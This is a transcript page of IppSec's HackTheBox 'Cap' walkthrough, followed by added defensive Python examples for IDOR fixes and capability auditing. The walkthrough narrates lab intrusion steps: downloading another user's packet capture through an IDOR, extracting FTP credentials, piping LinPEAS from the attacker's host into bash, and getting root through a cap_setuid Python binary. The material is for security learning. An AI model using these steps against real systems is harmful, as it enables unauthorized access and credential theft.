HackTheBox - Cap

IppSec · Beginner ·📰 AI News & Updates ·4y ago

Key Takeaways

Enumerates the box with nmap, finds an IDOR vulnerability in the web application that exposes FTP credentials in a downloadable packet capture, and escalates privileges through a setuid capability set on the Python binary.

Full Transcript

What's going on, YouTube? This is IppSec, and I'm doing Cap from Hack The Box. The name is extremely relevant to the challenge, because the foothold is based upon a packet capture and then the privesc is based upon a capability. It starts off with finding a web page that allows you to download some packet captures that are created around your session, but you can download other people's packet captures by just guessing the ID. So your packet captures are probably one, two or three; if you just go backwards and try zero, you can get a packet capture from admin, which is just FTP. So you can view the packet capture, extract the FTP password, log into the box, and then, running LinPEAS, you'll find out that Python has the setuid permission, or setuid capability. So you can just open up Python, import os, do os.setuid(0), and get root.

With all that being said, let's jump in. As always, we're going to start with the nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory, and then we'll call it... I think Cap is the name of this machine, and the IP address is 10.10.10.245. This can take some time to run, so I'm just going to run this with the -v flag so it shows me open ports as it finds them, and we can see right off the bat we have 22, 80 and 21.
21 is FTP, so it's super quick to test. The very first thing I like doing is just netcatting to it, so 10.10.10.245 port 21, and this gets us the banner: we see vsftpd version 3.0.3. So we can do searchsploit vsftpd, if I can spell that correctly, and spell searchsploit correctly as well, and we see there's only exploits for 2.3.4. I probably would look at the release date for this as well, so we can probably just go to Google and say "vsftpd changelog"; changelog is a good word to often get the dates that versions were released, and we have something right here. So let's see, what is this 3.0.3? So the changelog... updated version 3.0.2. I wonder if there's a different place we could be getting this from. 3.0.2 versus 3.0.3 changes, so we can see this was released... it doesn't have a date that I see. Let's see, this is an email; I don't really see anything. If I click this, does this get me to a repo? It does tell us 3.0.5 is the most up-to-date version, but I'm still having trouble finding a date on this. What I'm going to try doing is wget-ing this file, and it's key to use wget: if you just save it with Firefox or something, you're not going to have this thing. So I'm going to run exiftool on the changelog, and let's see if this has an old date: 2015, July 25th. So this is probably around the time that 3.0.3 was released. We could go Googling more, but I'm going to take that as the release date. If I use curl, when you do this I don't think you see that... yeah, curl does not preserve this by default, so that is why I used wget. But that was a huge kind of rabbit hole. FTP doesn't change all that much, so seeing it to be like six years old isn't really that big of a deal, especially for a major package like vsftpd. Additionally, searchsploit doesn't really have anything for version 3, so I'm just going to assume this is secure, and that's why I kind of move on. So we've done enough where nmap should be finished, so we can look at the results, nmap/cap.nmap. The other thing I would be testing is anonymous login, so
we could just do ftp 10.10.10.245 and try anonymous. Like, the theme of this video is apparently going to be spelling. But we try logging in and we can't get anonymous, and also nmap does that by default as part of one of the default scripts. So I don't think we can really do too much more with FTP. We could try setting up a brute force and trying to brute force a username, but again, with the brute force of a full credential, we don't even know the users on this box, so that's why I'm not going to start doing any type of brute forcing. If I knew a username right off the bat, I probably would have just set up Hydra or something to brute force that. SSH tells us this is an Ubuntu box. We have Gunicorn running on an HTTP server, which kind of tells me this is not going to be PHP; Gunicorn is often for Python apps. It may be used for other things; let's see, is it only Python? Let's see if it says Python on their home page. It is only Python: "Python WSGI", Web Server Gateway Interface, I believe that's what WSGI stands for, but it's how you have Python be a middleman. Normally you put nginx in front of Gunicorn, but it is just a web server for Python. So it is a Python application that we are looking at. So 10.10.10.245, let's take a look at this, and because it is Python I know not to worry about it being WordPress, Joomla, Drupal, all those PHP applications. Looking at this, I'm going to guess probably Flask. The two frameworks you generally meet with Python are Flask and Django, and Django does have a default page; I think by default it will create /admin. Django is a lot more feature-rich of a framework than Flask, as Flask is pretty minimal and Django has built-in user management, things like that. So, it not having /admin, I'm thinking this is Flask. Before doing anything, let's take a look at what we can do. Oddly enough, we're logged in, so I'm going to look at cookies. I'm just going to go to Storage, and we don't have anything, so this is a
weird app. If I click this and try to log out, it goes nowhere; we just have this anchor text. So there's not much I can really do from this point, so I'm going to click on Security Snapshot to see what else is here, and then I'm going to Ctrl-click on the other two things. So this: we have /data/2 and we have a pcap, so I'm going to download this, and I'm going to look at the other things. So this is network input or output; it looks like the output of ifconfig. If I do ifconfig, you can see very similar output. I'm trying to think of how to get commands; maybe I'd fuzz this and do cmd=ls and try understanding how this works. It looks like it's just a static page, and as I say "static page", probably not, because here is me connecting to port 80. If I do a connection to port 22, ssh 10.10.10.245, and we refresh this, we should see me also connecting to 22. There it is, so not a static page, but it doesn't look like there's a way for me to change the command. So if I get stuck, that's probably what I'm going to revisit and use wfuzz to see if we can fuzz any type of hidden commands. Just refreshing this, glancing through all the things, nothing. We could also try other commands, so we could try doing a dirbust: there's /ip, there's /netstat, we could try /ls, see if it's just doing commands. The reason why I'm not really going down this route is, while this is the netstat output, this is not the ip output. ip is a command; if I do ip, we have help, I need to do ip addr, and it kind of gets me the output, except I don't have the interface number here, so 1, 2, 3, 6; we don't have that. So we can confirm this is indeed ifconfig, so just knowing the output of commands right now. So let's close those tabs. We downloaded this pcap, so let's take a look at it: mv Downloads/2.pcap here, wireshark 2.pcap, and we'll see what we have. There is GET HTTP, and is this me? Yeah, this is me sending data to the server, so that's interesting. It is trying to go for
two, so I'm going to try one, and we actually get something here. So let's try zero, and this looks like it is an IDOR vulnerability, that's like indirect object reference. So there's no ACLs put around these URL pages, so if you just happen to guess it you can access it. Like, if I go to this capture page... oh, if I go to /capture it looks like it may set up tcpdump, and that's what happens: because I go to /capture it redirects me to /data/2, but we can download other users' sessions if we just guess the ID. And this is a super common attack; I think I mentioned it before, but the DEF CON ticketing system vendor thing was kind of vulnerable to it, because it gave you your order ID, which was sequential, and if you just decremented the order ID you could get other people's ticket information. So again, it's a super common attack. It doesn't normally lead to access to the server, but you generally get access to other features that may be good. So let's do mv Downloads/0.pcap and we can Wireshark this one, see if there's anything else. So this is a 192.168 network talking to another 192.168.
So I'm going to Follow TCP Stream and we can look at this. This is just an HTTP page. Let's do tcp.stream eq 1; this looks like another HTTP, right click, Follow, so we can kind of view what it is. This is getting a CSS. Let's go to the next stream, HTTP as well; Ctrl+Alt+Shift+T is the shortcut. So this is just responding with a 404. Go to the next one, oh, we have FTP. So I press Ctrl+Alt+Shift+T and we have credentials: nathan, and then the password. So I'm going to try that in FTP: ftp 10.10.10.245, nathan, paste that password, and login successful. We just have user.txt; we don't have an .ssh directory. I did dir here hoping that there would be .ssh. Can I mkdir .ssh? Permission denied, so we can't make them. If I wanted to it would have to be .ssh, but it doesn't look like that exists. .bash_history is pointed to nothing. .bashrc, we could try getting this and modifying it, but I don't think I'm user 1001. If I was this UID I probably could, because that's the owner, read-write, and I know I'm not that because I couldn't write to the FTP directory. And even if I was that, there is a chance I can't just write files, because FTP could be configured in read-only mode. But again, not much I can do here. If I could edit .bashrc I would probably put a reverse shell there, and the next time the user logs into the system he sends me a shell; but again, can't edit that file. So let's go and try SSH; maybe he just reused that password. So ssh with this user. The other good files to grab are also anything beginning with a dot, like .viminfo; well, I think there's a .vim history potentially being created, a .bash_history; those are all good files to download. My clipboard is not what I expect, so let's copy that, Ctrl+Shift, there we go. So logging in with nathan, and we have four zombie processes, we got some updates. Doing ls: user.txt, and nothing too much here. So let's run LinPEAS. So I'm gonna mkdir www, go in this, and then cp /opt/... was it privilege
escalation awesome suite, I think? There we go, priv... there we go, and then we want LinPEAS, and linpeas.sh. So copy that there, and we have to do a web server, python3 -m http.server, and we can do curl 10.10.14.8/linpeas.sh and pipe it over to bash; we have to specify port 8000, so specify that, and now it is running. So I guess while that runs we could take a look at things. So I'm going to ssh 10.10.10.245, specify nathan, and let's see what I would look at right off the bat while that runs. Is it the wrong clipboard again? There we go. So my first thing is I want to check out the web server. So we don't have anything there; is it /var/www/html? And we have app.py, so let's go take a look at it. We have Flask, which is the framework we guessed, and let's see: templates auto reload, limiter. The main thing I'm looking for is some type of credential, like maybe it connects to a database. It doesn't look like it connects to a database, so there's no credential there. The other thing I'm looking for now is that IP and netstat page. So this is the pcap, and the reason why is just because we haven't really looked that much at it. Let's see, as I say that I was just reading this command, see if there's any way to get command injection. This is how it's doing the capture, so if I search for path, path is set by something that's not user, and then ip; let's see how it gets ip: request remote address. So we can't set any of these things, so I know there's no command injection here, because there's no asking for user input. So let's go to /ip and see what this is. This is just doing, again, os.popen, ifconfig, reading it and printing it, so there's no user input there, so we can't really exploit anything. Same thing with netstat: no user input, it's just hard-coded commands. So that's why I'm kind of ignoring all these, because there's no place in this application for us to give input. We have /data/<id>, and this is where we're giving input to id, but it's specifying it is an integer and
not really doing that much. Let's see, oh, uploads. So I was thinking maybe directory traversal, but nothing too special here; it doesn't look vulnerable from first glance. Well, it's definitely not vulnerable, because the id is just an integer, so we can't really put ../ or anything. If we had Python, so python3, and we try a = int() and we pass it "a_1", we get an error because that's not an int, so it can't really be vulnerable to anything, with just specifying integers, other than that IDOR vulnerability. But now we've kind of poked around long enough for LinPEAS to finish, so let's take a look at this. I'm just gonna go search for my curl and then move up to look at it, and let's see: we got Ubuntu 20, sudo version 1.8.31. That's the one thing we did not check; we didn't check about sudo, if we can just run sudo -l, enter our password, we know the password, paste it in: "may not run sudo", so can't really do anything with that. Date and uptime, system stats. We have LXD, so again, LinPEAS is gonna tell us, but I always just like double checking, so I see LXD, I check the groups to see if I'm a member of lxd. If I am, then we can upload an image and then mount the root disk to that image; it's much like the Docker thing. If you just go to ippsec.rocks and type in lxd, you can see me exploiting it in two different videos. CPU info, nothing too interesting here. Environment, virtual machine yes, unmounted file systems. So processes, crons, sockets, whatever; there's a reverse shell. Cron jobs: e2scrub_all, I don't know what that is, that may be a normal one or that may be unique, so I'm going to take a look at it because again I don't know it. Let's see what this is doing; it looks like it's probably something standard, e2fs; I wonder if that's like a file system thing, scrub all, and I just normally don't use that file system. What is it mounted as? That's the fstab: sda, it's LVM. Not exactly sure, but don't know what that is; doesn't look vulnerable.
So no unique crons. These are services installed, the PATH, system timers; everything here looks normal. Timer files, .sockets, again nothing here really; just looking for it to highlight something. That's just DNS, so nothing interesting there. sudo -l, can't find anything. Users: users with a console, nathan and root, so we don't have any other users. All users and groups, nothing. Last logon: interestingly enough, there is "lab", but that user doesn't exist anymore, so I'm going to check out ls -la /home, and it's just nathan, so not sure. MySQL, Postgres, PHP; looking for a bunch of configs. rsync, this is just the default config. LDAP files. Oh, why'd it just... come on, it just jumped all the way to the bottom for me. OVPN, nothing. PermitRootLogin, see. Cloud-init files; it's in snap; normally the things within snap are not too interesting, it's like a package manager, so users aren't really editing these files, so it's not interesting because it's just from the image. Chrome, bind. This is an easy box, right? It should be somewhere here. So these are setuid; I'm looking for anything that is out of the ordinary. All these look to be standard. Setgid, it's highlighting "at"; I don't know why it's not highlighting the whole thing, so I don't think it's a vulnerability, it's probably just it grepping wrong. So we got capabilities, and right here we have something: we have python3.8 with the capability setuid. So it looks like we can use Python to setuid, and if Python's owned by root we can probably setuid to root. So let's look at ls -la /usr/bin/python3.8; it is owned by root. So let's try this. We're just going to run python3, and we want os, and is it os.setuid? "should be integer, not string", so os.set... Well, before I do this, let's do os.system("id") so we can see. It prints 0 at the end; does it just do that every time? whoami, okay, it's always printing 0; it's probably the exit code, not sure. But we are nathan, so if I do os.setuid(0), whoami again, we are now root because we
issued the setuid command. So we can just do os.system("sh") and now we drop to a root shell; I can go cd /root and we can access this file, so root.txt, and there you have it, that is the box. This was a lot quicker than I expected; I'd normally like my videos to be at least the half hour mark, so let's go play with this pcap a little bit more. So generally in CTF challenges I don't use Wireshark; it's just great for the video, but what I would do is use Zeek. And I do -h; we need two flags. The first flag we need is kill checksums, so -C, capital C, and then the next flag we need is read file. So if we do... let's make the pcap directory: mv * to pcap; oh, I meant to do *.pcap. So let's just move these files. There we go, and let's try zeek, no checksum, read file, *.pcap, and I wonder if we can only do one at a time here; there's probably a way to do a directory. Zero is the interesting one, so I'm gonna do 0.pcap, and we have all these lines. So this has just parsed the pcap for us. We can look at conn.log, see what it is; we can do ftp, and oh, by default Zeek is hiding this, so we can't see the password by default. The reason for this is a lot of people may have it on a SIEM and send these logs over to some type of index where people can view them, and you generally don't want to put passwords in Splunk, Elastic, Graylog, things like that, because if someone gains access to it they get the password, and it's a bad day from there. So by default Zeek will do things like hide passwords. So if we locate ftp, grep for zeek to look for this plugin, we can edit this. If you have trouble installing Zeek there should be a video on it, right? Yeah, we got Scavenger; I'd take a look at that video to understand more about Zeek. But we can see there is an FTP one here; let's see, it's probably main, ftp/main, password; let's see, "password hidden", that's not what I want. Let's try info.zeek; it's getting info out of the pcap, and we can see it here: option default capture
password, it's set to false. Change that to true, and I probably have to be root to do this, and then we're going to run Zeek again. So let's do zeek -Cr 0.pcap, and ftp.log, and now we have nathan and the password. There is zeek-cut, I think; is it bro-cut on here? Zeek... I would look at this video. I don't know where this binary is; I have it there as zeek-cut, but maybe I don't have it here. See, can I install it? It's probably zeek-utils or bro-utils and I'm missing a package. But if you want to know more, I'd look at those programs, look at this video, because this is where I actually prepared to talk about Zeek/Bro IDS; I don't know it just off the top of my head. But if you have the zeek-cut thing, you just do zeek-cut user password and it will automatically print these two strings for you and just hide all this other stuff. But that is how I do it if we had a lot more data in the pcap. So hope you guys enjoyed the video, take care, and I will see you all next week.
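The /data/<id> endpoint in the video serves any capture whose integer id exists, which is why walking the ids downward reaches admin's session. The following is an added example, not the box's app.py: it models the route as plain Python functions (constructed sample data, hypothetical names such as `CaptureStore` and `data_hardened`) so it runs without Flask, and puts the observed behaviour next to two fixes: an ownership check bound to the authenticated session, and opaque handles instead of the sequential counter.

```python
"""Model of the /data/<int:id> authorization flaw seen on Cap, and its fix.

Added example, not the box's app.py: the Flask request handling is reduced
to plain functions (constructed sample data, hypothetical names) so it runs
offline. Each handler returns an (http_status, body) pair.
"""
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

Response = Tuple[int, Optional[str]]


@dataclass
class Capture:
    capture_id: int
    owner: str   # the authenticated user whose /capture request created it
    path: str    # where the pcap was written on disk


@dataclass
class CaptureStore:
    """In-memory stand-in for the app's uploads/ directory and id counter."""
    captures: Dict[int, Capture] = field(default_factory=dict)
    handles: Dict[str, int] = field(default_factory=dict)  # opaque token -> id

    def add(self, owner: str, path: str) -> Capture:
        # Sequential ids, exactly what made the real endpoint enumerable.
        cap = Capture(len(self.captures), owner, path)
        self.captures[cap.capture_id] = cap
        return cap

    def handle_for(self, capture_id: int) -> str:
        """Issue an unguessable handle for a capture (defence in depth)."""
        token = secrets.token_urlsafe(16)
        self.handles[token] = capture_id
        return token


def data_vulnerable(store: CaptureStore, session_user: str, capture_id: int) -> Response:
    """Behaviour observed on the box: the route only checks that the id is an
    integer that exists, so decrementing the id reaches admin's capture."""
    cap = store.captures.get(capture_id)
    if cap is None:
        return 404, None
    return 200, cap.path


def data_hardened(store: CaptureStore, session_user: str, capture_id: int) -> Response:
    """Fix: bind the lookup to the authenticated session. A capture that is
    not yours gets the same 404 as one that does not exist, so the status
    code does not confirm which ids are populated."""
    cap = store.captures.get(capture_id)
    if cap is None or cap.owner != session_user:
        return 404, None
    return 200, cap.path


def data_by_handle(store: CaptureStore, session_user: str, token: str) -> Response:
    """Second layer: the URL carries an opaque token instead of the counter,
    and the ownership check still applies to the resolved record."""
    capture_id = store.handles.get(token)
    if capture_id is None:
        return 404, None
    return data_hardened(store, session_user, capture_id)


def leaked_ids(handler: Callable[[CaptureStore, str, int], Response],
               store: CaptureStore, session_user: str) -> List[int]:
    """Regression check: ids the handler serves to a user who does not own them."""
    return sorted(
        cid for cid, cap in store.captures.items()
        if cap.owner != session_user and handler(store, session_user, cid)[0] == 200
    )


def seeded_store() -> CaptureStore:
    """Constructed sample data: admin's capture took id 0, as in the video."""
    store = CaptureStore()
    store.add("admin", "uploads/0.pcap")
    store.add("alice", "uploads/1.pcap")
    store.add("bob", "uploads/2.pcap")
    return store


if __name__ == "__main__":
    s = seeded_store()
    print("vulnerable handler leaks to bob:", leaked_ids(data_vulnerable, s, "bob"))
    print("hardened handler leaks to bob:  ", leaked_ids(data_hardened, s, "bob"))
    print("bob via opaque handle:", data_by_handle(s, "bob", s.handle_for(2)))
```

The `leaked_ids` check is the one to keep in a test suite: it iterates every stored record as a given user and fails if any record owned by someone else comes back with a 200. Returning 404 rather than 403 for another user's capture is deliberate, so the response does not tell a caller which ids exist.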
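LinPEAS found the privesc by listing file capabilities, and the same check is worth running as a routine audit. The following is an added example, not part of the video or of LinPEAS: it parses the output of `getcap -r / 2>/dev/null` in both formats getcap has used, and flags capabilities that allow escalation, marking interpreters separately since they run whatever the caller feeds them. The sample output is constructed; only the python3.8 cap_setuid line corresponds to what the video showed, and the other entries are typical benign ones added so the script runs offline.

```python
"""Audit `getcap -r / 2>/dev/null` output for capabilities that hand a user
root, the check LinPEAS ran in the transcript.

Added example. The getcap invocation is real and both output formats it has
used (`path = caps+ep` and `path caps=ep`) are handled; the sample output
below is constructed so the script runs offline, with the python3.8
cap_setuid line the video found alongside benign entries.
"""
import re
from typing import List, Tuple

# Capabilities that let the holder become root or read/write any file.
# Expected on a purpose-built helper; a problem on a general-purpose binary.
ESCALATION_CAPS = {
    "cap_setuid": "can change to uid 0",
    "cap_setgid": "can change to any gid",
    "cap_sys_admin": "broad admin, includes mounting",
    "cap_sys_ptrace": "can attach to root processes",
    "cap_sys_module": "can load kernel modules",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "reads any file",
    "cap_chown": "changes ownership of any file",
    "cap_fowner": "bypasses owner checks",
    "cap_setfcap": "grants capabilities to other files",
}

# Interpreters and shells run whatever the caller feeds them, so an
# escalation capability on them is usable straight from the command line.
INTERPRETER = re.compile(r"^(python|perl|ruby|node|php|lua|bash|sh|dash|zsh|gdb)[0-9.]*$")

# One getcap clause: comma-separated names, then '+' or '=', then flags e/i/p.
CLAUSE = re.compile(r"^([a-z_,]*)[+=]([eip]*)$")

Finding = Tuple[str, str, str]  # (path, capability, reason)


def parse_getcap_line(line: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Return (path, [(cap_name, flags), ...]) for one getcap output line."""
    line = line.strip()
    if " = " in line:                       # older libcap: /usr/bin/ping = cap_net_raw+ep
        path, caps = line.split(" = ", 1)
    else:                                   # newer libcap: /usr/bin/ping cap_net_raw=ep
        path, _, caps = line.partition(" ")
    parsed = []
    for clause in caps.split():
        m = CLAUSE.match(clause)
        if not m:
            continue
        names, flags = m.group(1), m.group(2)
        for name in filter(None, names.split(",")):
            parsed.append((name, flags))
    return path, parsed


def is_interpreter(path: str) -> bool:
    return bool(INTERPRETER.match(path.rsplit("/", 1)[-1]))


def audit_getcap(output: str) -> List[Finding]:
    """Flag escalation capabilities that are permitted ('p') on a file."""
    findings: List[Finding] = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        for name, flags in caps:
            if name in ESCALATION_CAPS and "p" in flags:
                reason = "interpreter" if is_interpreter(path) else "binary"
                findings.append((path, name, reason))
    return findings


# Constructed sample; only the python3.8 line corresponds to what the video showed.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for path, cap, reason in audit_getcap(SAMPLE_GETCAP):
        print(f"{path}: {cap} ({ESCALATION_CAPS[cap]}) on a general-purpose {reason}")
```

Only the permitted set ('p') is considered, since a capability that is merely inheritable ('i') cannot be used by the file on its own; the list of escalation capabilities is a starting point, not exhaustive. On a real host, pipe `getcap -r / 2>/dev/null` into `audit_getcap` and treat every interpreter finding as a misconfiguration to remove with `setcap -r`.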

Original Description

00:00 - Intro
00:50 - Start of nmap and doing some recon against FTP
02:40 - Having trouble finding a release date, using WGET and examining metadata to see how old a page is
04:45 - Examining the web application
08:50 - Testing and finding the IDOR Vulnerability
10:00 - Examining the PCAP Downloaded through the IDOR Vulnerability to find FTP Creds
12:12 - SSHing into the box with the credentials from FTP
13:15 - Running LINPEAS, examining the source code of the webapp while it runs
16:45 - Going over the LINPEAS output finding python has the ability to setuid
21:40 - Using the os library to setuid to root
23:30 - Showing off zeek which would help analyze larger pcaps
24:10 - Changing the Zeek FTP Configuration to show passwords.